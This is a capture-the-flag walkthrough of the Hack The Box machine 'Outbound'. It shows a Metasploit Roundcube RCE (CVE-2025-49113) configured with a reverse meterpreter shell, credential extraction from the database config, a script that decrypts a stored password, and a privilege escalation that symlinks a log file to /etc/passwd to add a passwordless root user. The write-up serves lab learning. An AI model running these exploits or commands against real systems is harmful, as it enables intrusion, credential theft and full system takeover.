Outbound

💡 Machine Information
As is common in real life pentests, you will start the Outbound box with
credentials for the following account tyler / LhKL1o9Nm3X2

Initial Nmap Scan:

nmap -A -p- 10.10.11.77 -T4

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 00:00 +05
Nmap scan report for 10.10.11.77
Host is up (0.090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protoco
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_k
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)

Outbound 1
 HOP RTT ADDRESS
1 89.37 ms 10.10.14.1
2 89.69 ms 10.10.11.77

OS and Service detection performed. Please report any incorrect results at https:
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds

Initial Access - Roundcube RCE (CVE-2025-49113)

The target was found to be running Roundcube 1.6.10, vulnerable to RCE via
authenticated email.
Credentials Provided:
tyler / LhKL1o9Nm3X2

Outbound 2
 Roundcube 1.6.10 - Remote Code Execution (RCE)
Roundcube 1.6.10 - Remote Code Execution (RCE). CVE-2025-
49113 . webapps exploit for Multiple platform

https://www.exploit-db.com/exploits/52324

Outbound 3
 Exploit Used:
Roundcube Authenticated RCE (CVE-2025-49113)

Used the Metasploit module:

msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > options

Module options (exploit/multi/http/roundcube_auth_rce_cve_2025_49113):

Name Current Setting Required Description

---- --------------- -------- -----------
HOST no The hostname of Roundcube se
PASSWORD LhKL1o9Nm3X2 yes Password to login w
Proxies no A proxy chain of format type:hos
RHOSTS 10.10.11.77 yes The target host(s), see http
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing
SSLCert no Path to a custom SSL certificate
TARGETURI http://mail.outbound.htb/?_task=mail&_mbox=INBOX yes The
URIPATH no The URI to use for this exploit (
USERNAME tyler yes Email User to login with
VHOST mail.outbound.htb no HTTP server virtual hos

When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh

Name Current Setting Required Description

---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on.
SRVPORT 8080 yes The local port to listen on.

Payload options (linux/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

Outbound 4
 LHOST 10.10.14.18 yes The listen address (an interface may be specified
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Linux Dropper

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) >

Outbound 5
 Post-Exploitation - Database Credential Dump

Database Config Extracted:

Outbound 6
 $config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube

Outbound 7
 💡 'rcmail-!24ByteDESkey*Str’

USE roundcube;
SELECT * FROM session;

Outbound 8
 'rcmail-!24ByteDESkey*Str’

💡 L7Rv00A8TuwJAr67kITxxcSGnIk25Am/

Outbound 9
 Decrypting User Password from DB (DES3 CBC):
Extracted encrypted string: L7Rv00A8TuwJAr67kITxxcSGnIk25Am/

Decryption script using known key:

cat script.py
from base64 import b64decode
from Crypto.Cipher import DES3

Outbound 10
 encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
des_key = b'rcmail-!24ByteDESkey*Str'

data = b64decode(encrypted_password)
iv = data[:8]
ciphertext = data[8:]

cipher = DES3.new(des_key, DES3.MODE_CBC, iv)

decrypted = cipher.decrypt(ciphertext)

cleaned = decrypted.rstrip(b"\x00").rstrip(b"\x08").decode('utf-8', errors='ignor

print("[+] Пароль:", cleaned)

Recovered Password: 595mO8DmwGeD

㉿
┌──(po-venv)─(grover Grover)-[~/HTB/Outbound]
└─$ python3 script.py
[+] Пароль: 595mO8DmwGeD

Lateral Movement - User: Jacob

SH into the machine using new creds, or switched user locally to jacob

Outbound 11
 Discovered mail directory:

/home/jacob/mail/INBOX/jacob

cd /home/jacob
jacob@mail:~$ ls
ls
mail
jacob@mail:~$ cd mail
cd mail
jacob@mail:~/mail$ ls
ls
INBOX Trash
jacob@mail:~/mail$ ls -la
ls -la
total 36
drwx------ 1 jacob jacob 4096 Jul 9 12:41 .
drwxr-x--- 1 jacob jacob 4096 Jun 7 13:55 ..
drwx------ 1 jacob jacob 4096 Jul 9 12:41 .imap
-rw------- 1 jacob jacob 11 Jun 7 13:59 .subscriptions
drwxrwx--- 3 jacob jacob 4096 Jul 9 12:41 INBOX
-rw------- 1 jacob jacob 528 Jun 7 13:59 Trash
jacob@mail:~/mail$ cd INBOX
cd INBOX
jacob@mail:~/mail/INBOX$ ls
ls
jacob
jacob@mail:~/mail/INBOX$ cd jacob
cd jacob
bash: cd: jacob: Not a directory
jacob@mail:~/mail/INBOX$ cat jacob
cat jacob
From tyler@outbound.htb Sat Jun 07 14:00:58 2025
Return-Path: <tyler@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb

Outbound 12
 Received: by outbound.htb (Postfix, from userid 1000)
id B32C410248D; Sat, 7 Jun 2025 14:00:58 +0000 (UTC)
To: jacob@outbound.htb
Subject: Important Update
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20250607140058.B32C410248D@outbound.htb>
Date: Sat, 7 Jun 2025 14:00:58 +0000 (UTC)
From: tyler@outbound.htb
X-IMAPbase: 1749304753 0000000002
X-UID: 1
Status:
X-Keywords:
Content-Length: 233

Due to the recent change of policies your password has been changed.

Please use the following credentials to log into your account: gY4Wr3a1evp4

Remember to change your password when you next log into your account.

Thanks!

Tyler

From mel@outbound.htb Sun Jun 08 12:09:45 2025

Return-Path: <mel@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb
Received: by outbound.htb (Postfix, from userid 1002)
id 1487E22C; Sun, 8 Jun 2025 12:09:45 +0000 (UTC)
To: jacob@outbound.htb
Subject: Unexpected Resource Consumption
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"

Outbound 13
 Content-Transfer-Encoding: 8bit
Message-Id: <20250608120945.1487E22C@outbound.htb>
Date: Sun, 8 Jun 2025 12:09:45 +0000 (UTC)
From: mel@outbound.htb
X-UID: 2
Status:
X-Keywords:
Content-Length: 261

We have been experiencing high resource consumption on our main server.

For now we have enabled resource monitoring with Below and have granted you
Please inform us immediately if you notice any irregularities.

Thanks!

Mel

jacob@mail:~/mail/INBOX$

Read internal mails:

Mail from Tyler with credentials: gY4Wr3a1evp4
Mail from Mel mentioning Below monitoring tool being enabled.

💡 gY4Wr3a1evp4

Outbound 14
 rivilege Escalation - Below Log Symlink Abuse
Exploited the log writing feature of Below, which writes error logs to
/var/log/below/error_root.log.

echo 'pwn::0:0:pwn:/root:/bin/bash' > /tmp/fakepass

rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
cp /tmp/fakepass /var/log/below/error_root.log

Created a fake root user pwn.

Logged in using su pwn.
Outcome: Full root shell achieved.

su pwn

Outbound 15
Outbound 16